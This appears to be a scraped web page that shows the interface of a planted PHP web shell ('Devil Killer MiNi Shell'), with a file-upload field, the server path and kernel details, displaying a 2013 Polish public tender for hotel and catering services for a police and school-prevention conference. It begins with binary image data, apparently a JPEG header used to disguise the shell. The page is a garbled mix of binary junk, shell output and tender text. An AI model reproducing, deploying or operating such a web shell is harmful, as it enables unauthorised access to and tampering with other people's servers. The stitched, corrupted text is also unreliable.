JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130919/381556-N-2013.html

<p class="kh_header"><b>Kraków: Wykonanie usług hotelarskich i restauracyjnych na potrzeby realizacji 2 dniowej Konferencji dla przedstawicieli Małopolskiej Policji w ramach programu pn. Zagrożenia w Sieci - profilaktyka, reagowanie oraz 3 dniowej Szkoleniowej Konferencji Profilaktycznej Przeciwdziałanie niepożądanym zachowaniom w szkole dla dyrekcji, nauczycieli, wychowawców, pedagogów oraz psychologów szkół z terenu Województwa Małopolskiego</b><br>
<b>Numer ogłoszenia: 381556 - 2013; data zamieszczenia: 19.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Małopolskie , ul. Basztowa 22, 31-156 Kraków, woj. małopolskie, tel. 012 4300394, 6303408,6303122, faks 012 6160144,6303126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług hotelarskich i restauracyjnych na potrzeby realizacji 2 dniowej Konferencji dla przedstawicieli Małopolskiej Policji w ramach programu pn. Zagrożenia w Sieci - profilaktyka, reagowanie oraz 3 dniowej Szkoleniowej Konferencji Profilaktycznej Przeciwdziałanie niepożądanym zachowaniom w szkole dla dyrekcji, nauczycieli, wychowawców, pedagogów oraz psychologów szkół z terenu Województwa Małopolskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usług hotelarskich i restauracyjnych na potrzeby realizacji 2 dniowej Konferencji dla przedstawicieli Małopolskiej Policji w ramach programu pn. Zagrożenia w Sieci - profilaktyka, reagowanie oraz 3 dniowej Szkoleniowej Konferencji Profilaktycznej Przeciwdziałanie niepożądanym zachowaniom w szkole dla dyrekcji, nauczycieli, wychowawców, pedagogów oraz psychologów szkół z terenu Województwa Małopolskiego.
2. Zamówienie składa się z dwóch części:
2.1 Część 1 obejmuje usługi hotelarskie i restauracyjne na potrzeby realizacji 2 dniowej Konferencji dla przedstawicieli Małopolskiej Policji w ramach programu pn. Zagrożenia w Sieci - profilaktyka, reagowanie w dniach 21 i 22 października 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska, gminy Białka Tatrzańska lub gminy Krynica Zdrój.
2.1.1 Przedmiot  zamówienia tej części obejmuje:
a) Wykonania Usługi noclegowej w dniu 21 października 2013 r. (jeden nocleg) przy zapewnieniu 15 jednoosobowych pokoi i 30 pokoi dwuosobowych. 
W przypadku jednego pokoju jednoosobowego Wykonawca może zostać zobowiązany do dostarczenia dodatkowego łóżka, za co nie będzie przysługiwać dodatkowe wynagrodzenie.
W cenę noclegu, o którym mowa wyżej, zostanie wliczone śniadanie serwowane w dniu 22 października 2013 r., dla 75 osób, obejmujące: bufet gorący - 2 dania gorące do wyboru oraz bufet zimny- wędliny, sery, jajka, dżemy, jogurty naturalne, owocowe, mleko, musli, masło, pieczywo, napoje: kawa (i mleczko do kawy), herbata(i cytryna do herbaty), woda mineralna, soki owocowe.
b) Zapewnienie jednej sali wykładowej - w dniach 21 i 22 października 2013 roku mieszczącej co najmniej 75 osób dostępną w godzinach zgodnych z harmonogramem Konferencji, stanowiącym załącznik nr 1 do wzoru umowy. 
Sala wykładowa musi być utrzymana w czystości, z dostępem do zaplecza sanitarnego, pozbawiona przedmiotów niezwiązanych ze szkoleniem, z dostępem do światła dziennego oraz możliwością zasłonięcia okien, bez filarów utrudniających kontakt wzrokowy prowadzących z uczestnikami, wyposażona w sprawne ogrzewanie, sprzęt do prowadzenia szkoleń: nagłośnienie, ekran i projektor do wyświetlania multimediów, 1 flipchart z kartkami papieru oraz kompletem markerów, 1 ryzę papieru A4, 1 laptop, dostęp do Internetu. Wymagana jest w hotelu 1 osoba potrzebna do pomocy przy obsłudze technicznej.
Sala powinna być wyposażona w krzesła z rozkładaną podkładką umożliwiającą pisanie lub też krzesła i stoły umożliwiające swobodne pisanie na dwóch kartkach A-4, ustawione w układzie szkolnym dla uczestników konferencji, a także w prezydium dla wykładowców w postaci stołu z miejscami siedzącymi dla 3 osób o powierzchni pozwalającej na równoczesne swobodne umieszczenie na blacie laptopa i swobodne pisanie na dwóch kratkach A-4 na każdym z 3 stanowisk.
c) Usługi restauracyjnej dla uczestników konferencji, w godzinach zgodnych harmonogramem Konferencji stanowiącym załącznikiem nr 1 do wzoru umowy, w postaci: 
i. obiadu na gorąco w formie bufetowej (serwowanym na siedząco) w dniu 21 października 2013 roku dla 75 osób oraz w dniu 22 października dla 75 osób, zgodnie z poniższym opisem:
- dwa ciepłe dania mięsne do wyboru  - min. 130g/os (np. roladki z kurczaka ze szpinakiem, pieczony karczek, schab faszerowany, kurczak marynowany w occie balsamicznym) oraz  jedno ciepłe danie wegetariańskie - min 120 g/os (np. gołąbki jarskie w sosie pieczarkowym)  
- dodatki (ziemniaki gotowane lub ziemniaki opiekane lub frytki lub dufinki) - min. 100g/os, warzywa świeże w formie surówki, warzywa gotowane na parze lub warzywa z patelni - min. 100g/os, woda mineralna - 150 ml/os, soki - 150 ml/os - podane w dzbankach. 
ii. serwisu kawowego w dniach 21 i 22 października 2013 roku każdorazowo dla 75 osób w trakcie, którego będzie podawana mieszanka kruchych ciasteczek (co najmniej 3 rodzaje), w ilości nie mniejszej niż 50g z każdego rodzaju na osobę, ciasto domowe (np. sernik, szarlotka, brownie) - po min. 2 kawałki na osobę, owoce 3 kg (winogrona, jabłka, banany) soki owocowe (min. 2 rodzaje) w ilości nie mniejszej niż 250 ml na osobę, woda mineralna gazowana lub niegazowana podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę. 
Ponadto w  trakcie trwania konferencji, w tym na wszystkich przerwach, Wykonawca zapewni dostęp do gorącej kawy oraz herbaty (w termosach), oraz dodatków: mleko, cukier, cytryna - bez ograniczeń, najlepiej umieszczonych na oddzielnym stole,
iii. kolacji w stylu regionalnym w dniu 21 października dla 75 osób, podczas której Wykonawca zapewni co najmniej dwugodzinną atrakcję regionu w postaci degustacji tradycyjnych miejscowych potraw regionalnych,  składających się z:
-  przystawki w postaci przekąsek zimnych - min 30 g/os, 
- gorącego dania głównego z dodatkami - min.  210 g/os, 
- słodkiego deseru  - min. 60 g/os 
- napojów bezalkoholowych - min. 200 ml/os tj. kawa, herbata, soki
oraz z tradycyjną oprawą muzyczną
Uzgodnienie szczegółowego menu nastąpi przed podpisaniem umowy.
2.1.2 Wyżej wymienione usługi powinny być świadczone w obiekcie spełniającym następujące wymogi :
a) obiekt hotelarski znajdujący się w granicach administracyjnych gminy Bukowina Tatrzańska, gminy Białka Tatrzańska lub gminy Krynica Zdrój, wobec którego wydano decyzję o zaszeregowaniu do rodzaju hotel w rozumieniu ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U. z 2004, nr 223, poz. 2268 z późn. zm.) oraz nadaniu kategorii zgodnie z ww. ustawą. Standard obiektu nie niższy niż dla hoteli zaszeregowanych do kategorii 3 gwiazdki (***)
b) w odległości nie większej niż 500 m od w/w obiektu hotelarskiego musi znajdować się przystanek linii busowych/autobusowych lub kolejowych, przy czym musi on posiadać dogodne bezpośrednie połączenie dojazdowe busowe/autobusowe/kolejowe z siedziby gminy tj odpowiednio: z miejscowości Bukowina Tatrzańska (dla hotelu z gminy Bukowina Tatrzańska) lub z miejscowości Białka Tatrzańska (dla hotelu z gminy Białka Tatrzańska) lub z miejscowości Krynica Zdrój (dla hotelu z gminy Krynica Zdrój);
c) hotel powinien udostępnić uczestnikom konferencji możliwość zakwaterowania w pokojach hotelowych od godz. 12.00 w dniu 21 października 2013 roku, oraz możliwość zwolnienia rezerwacji pokojów hotelowych najpóźniej do godziny 15.30 w dniu 22 października 2013 roku. W przypadku niemożności udostępnienia pokojów uczestnikom w ww. godzinach hotel musi udostępnić pomieszczenie zamykane na klucz, w którym możliwe będzie pozostawienie bagaży przez osoby, które korzystać będą z noclegu podczas trwania konferencji. 
d) Każdy uczestnik korzystający z noclegu musi zostać poinstruowany, co najmniej słownie, przez obsługę hotelu, o sposobie korzystania z rezerwacji, zasadach korzystania z pokoju hotelowego oraz ostatecznej godzinie zwolnienia pokoju w dniu 22 października 2013 roku.
e) każdy z pokojów powinien być wyposażony w łazienkę z pełnym węzłem sanitarnym, TV, telefon stacjonarny. Pokoje dwuosobowe muszą być wyposażone w 2 komplety kluczy.
f) Przy obiekcie powinien znajdować się parking, z zapewnionymi min. 20 bezpłatnymi miejscami parkingowymi dla pojazdów uczestników konferencji, 
g) Przygotowanie posiłków musi odbywać się zgodnie z obowiązującymi w tym zakresie przepisami prawa. Śniadania, obiady i kolacja nie mogą być podawane w tym samym pomieszczeniu, w którym odbywają się wykłady.
h) Usługi objęte niniejszą umową mogą być wykonywane w jednym budynku lub w kompleksie budynków znajdujących się nie więcej niż 100 metrów od siebie.
2.1.3. Zamawiający zastrzega sobie prawo do dokonania zmian w Programie Konferencji stanowiącym załącznik nr 1 do umowy. Zmiany dotyczyć mogą zmian czasu trwania poszczególnych wykładów, w trakcie trwania Konferencji tj. maksymalnie +/- 60 minut dla każdego z wykładów w każdym dniu, przy zachowaniu warunków, że każda przerwa kawowa zawsze trwa 15 minut, każda przerwa obiadowa zawsze trwa 60 minut, a godziny rozpoczęcia i zakończenia Konferencji w poszczególnych dniach pozostają bez zmian. Zamawiający zobowiązuje się najpóźniej do dnia 18 października 2013 r. dostarczyć Wykonawcy ostateczny Program Konferencji.
2.2 Część 2 obejmuje  wykonanie usługi hotelarskiej i restauracyjnej na potrzeby realizacji 3 - dniowej ewaluacyjnej Szkoleniowej Konferencji Profilaktycznej Przeciwdziałanie niepożądanym zachowaniom w szkole dla dyrekcji, nauczycieli, wychowawców, pedagogów oraz psychologów szkół z terenu Województwa Małopolskiego uczestniczących już w pierwszym etapie szkolenia, w dniach 25, 26 i 27 listopada 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Białka Tatrzańska lub gminy Krynica-Zdrój.
2.2.1 Przedmiot  zamówienia tej części obejmuje:
a. Wykonania usługi noclegowej w dniach od 24 do 27 listopada 2013 r. (tj. 3 noclegi) przy zapewnieniu 
4 jednosobowych pokoi oraz dodatkowo, zapewnieniu 6 pokoi jednoosobowych w dniach od 25 do 27 listopada 2013 r. (tj. 2 noclegi). Śniadanie hotelowe ma być wliczone w cenę noclegu. Każdy z pokoi musi być wyposażony w TV,  telefon stacjonarny oraz łazienkę z pełnym węzłem sanitarnym.
b. Rezerwacji dodatkowych 20 pokoi dwuosobowych w dniach od 25 do 27 listopada 2013 r.(tj. 2 noclegi) dla uczestników, którzy wyrażą chęć skorzystania z pokoju, przy czym  koszty noclegu pokryją indywidualnie (Zamawiający może zgłosić, najpóźniej do dnia 20 listopada 2013 r., konieczność zamiany pokoju dwuosobowego na dwa pokoje jednoosobowe). Śniadanie hotelowe ma być wliczone w cenę noclegu. Każdy z pokoi musi być wyposażony w TV,  telefon stacjonarny oraz łazienkę z pełnym węzłem sanitarnym.
c. Podania serwisu kawowego dla 68 osób w dniach 25, 26 i 27 listopada 2013 r., w trakcie trwania szkolenia 
w godzinach zgodnych z Programem Szkoleniowej Konferencji Profilaktycznej stanowiącym załącznik nr 1 do wzoru umowy. Na serwis kawowy składać się ma: gorąca kawa rozpuszczalna, herbata, woda mineralna niegazowana, dodatki: mleko, cukier, cytryna - bez ograniczeń, mieszanka kruchych ciasteczek (co najmniej 3 rodzaje), w ilości nie mniejszej niż 50g z każdego rodzaju na osobę, ciasto domowe- po min. 2 kawałki na osobę, soki owocowe (min. 2 rodzaje) w ilości nie mniejszej niż 250 ml na osobę.
d. Podania obiadu dwudaniowego dla 68 osób w dniach 25, 26 i 27  listopada 2013 r. w trakcie trwania szkolenia w godzinach zgodnych z Programem Szkoleniowej Konferencji Profilaktycznej stanowiącym załącznik nr 1 do wzoru umowy, zgodnie z poniższym opisem: zupa, ciepłe danie główne (mięso lub ryba) - 150 g, dodatki (ziemniaki gotowane, opiekane lub frytki) - 150 g, 3 rodzaje surówek lub warzywa gotowane - 100 g, 2 rodzaje soków - 200 ml, woda mineralna - 200 ml /podana w dzbankach. Przykładowy zestaw: zupa cebulowa z grzankami - 300g, filet drobiowy de volaille (150g), ziemniaki opiekane - 150g,  3 rodzaje surówek - 100g, sok - 200ml, woda mineralna - 200 ml (podana w dzbankach).  Podane wagi dotyczą minimalnych ilości. Szczegółowe menu na każdy dzień realizacji zamówienia wymaga akceptacji przedstawiciela Zamawiającego. Uzgodnienie szczegółowego menu nastąpi przed podpisaniem umowy.
e. Podania kolacji dla 68 osób w dniach 25 i 26 listopada 2013 r., w godzinach zgodnych z Programem Szkoleniowej Konferencji Profilaktycznej stanowiącym załącznik nr 1 do wzoru umowy. Kolacja w formie bufetu (jajka na twardo w majonezie, wędliny różne, sery żółte różne, masło, miód, dżemy, sałatka wielowarzywna, pomidory, ogórki, pieczywo mieszane, kawa (i mleczko do kawy), herbata (i cytryna do herbaty), woda mineralna, z daniami ciepłymi (min. 2) do wyboru. 
f. Zapewnienie 4 sal warsztatowych mieszczących po 15 os. w dn. 25, 26, 27 listopada 2013 r. w godzinach zgodnych z Programem Szkoleniowej Konferencji Profilaktycznej stanowiącym załącznik nr 1 do wzoru umowy oraz zapewnienie 1 sali wykładowej mieszczącej min. 70 osób w dniach  25 i 27 listopada 2013 r. w godzinach zgodnych z Programem Szkoleniowej Konferencji Profilaktycznej stanowiącym załącznik nr 1 do wzoru umowy. Sale warsztatowe oraz sala wykładowa najlepiej z oknami oraz bez filarów utrudniających kontakt wzrokowy prowadzących z uczestnikami. Ponadto sale warsztatowe mają być bez stołów oraz zaopatrzone w: krzesła z rozkładaną podkładką umożliwiającą pisanie, ustawione w kręgu, rzutnik multimedialny, ekran projekcyjny, tablicę flipchart z papierem, ryzę papieru A-4, flamastry do pisania w 4 kolorach, samoprzylepne karteczki w 3 kolorach, taśmę malarską do przyklejania wypracowanych materiałów. Wymagania co do sali wykładowej to: nagłośnienie, rzutnik multimedialny, laptop, ekran projekcyjny, krzesła oraz prezydium dla wykładowców w postaci stołu z miejscami siedzącymi dla 5 osób ze swobodną możliwością umieszczenia na nim laptopa. Wymagana jest w hotelu 1 osoba potrzebna do pomocy przy obsłudze technicznej.
2.2.2 Pozostałe postanowienia przedmiotu umowy:
a. Usługi objęte niniejszą umową mogą być wykonywane w jednym budynku lub w kompleksie budynków znajdujących się nie więcej niż 100 metrów od siebie.
b. Zapewnienie dogodnego bezpośredniego dojazdu busowego/autobusowego/kolejowego z siedziby gminy odpowiednio, tj. z miejscowości Bukowina Tatrzańska do hotelu z gminy Bukowina Tatrzańska lub  z miejscowości Białka Tatrzańska do hotelu z gminy Białka Tatrzańska lub z miejscowości Krynica-Zdrój dohotelu z gminy Krynica-Zdrój, przy czym przystanek linii busowych /autobusowych/kolejowych musi znajdować się w odległości nie większej niż 500 m od obiektu hotelarskiego. 
c. W związku z rozpoczęciem konferencji w dniu 25 listopada 2013 r. o godz. 10:00 i jej zakończeniem w dniu 27 listopada 2013 r. o godz. 15:00 w przypadku niemożności udostępnienia pokojów uczestnikom w ww. godzinach, hotel musi udostępnić pomieszczenie zamykane na klucz, w którym możliwe będzie pozostawienie bagaży przez osoby, które korzystać będą z noclegu podczas trwania konferencji.
d. Hotel ma zapewnić co najmniej 20 bezpłatnych miejsc parkingowych dla  uczestników konferencji w dniach 25-27 listopada 2013 r. 
e. Wykonawca wykaże się dysponowaniem w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Białka Tatrzańska lub gminy Krynica-Zdrój hotelem w rozumieniu ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U z 2004, nr 223, poz. 2268 z późn. zm.) spełniającym następujące wymogi: obiekt hotelarski, wobec którego wydano decyzję o zaszeregowaniu do rodzaju hotel oraz nadaniu kategorii zgodnie z ww. ustawą, przy czym kategoria oznaczona w gwiazdkach nie może być niższa niż 3 gwiazdki.
3. Wielkość zamówienia: dla cześci 1 - 34959,35 zł netto, dla części 2 - 22487,08 zł netto.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki o których mowa w art. 22 ust. 1 ustawy.
2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
a) warunek udziału w postępowaniu o którym mowa w art. 22 ust 1 pkt 3 ustawy zostanie uznany za spełniony, gdy Wykonawca wykaże się, że dysponuje hotelem w rozumieniu ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U z 2004, nr 223, poz. 2268 z późn. zm.) spełniającym następujące wymogi: obiekt hotelarski, powinien mieć wydaną decyzję o zaszeregowaniu do rodzaju hotel oraz nadaniu kategorii zgodnie z ww. ustawą, przy czym kategoria oznaczona w gwiazdkach nie może być niższa niż 3 gwiazdki, hotel musi być położony w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Białka Tatrzańska lub gminy Krynica-Zdrój.
3. Wykonawca w zakresie spełniania warunków udziału w postępowaniu może polegać na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy. 
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np konsorcjum, spółka cywilna), wskazane wyżej warunki udziału w postępowaniu mogą spełniać łącznie.
5. Wykonawcy ubiegający się o udzielenie zamówienia nie mogą podlegać wykluczeniu na podstawie art. 24 ust. 1 ustawy.
6. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - niespełnia, w oparciu o dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonywania oceny spełniania dla tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi wymagań określonych przez zamawiającego - zał nr 4 do siwz</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
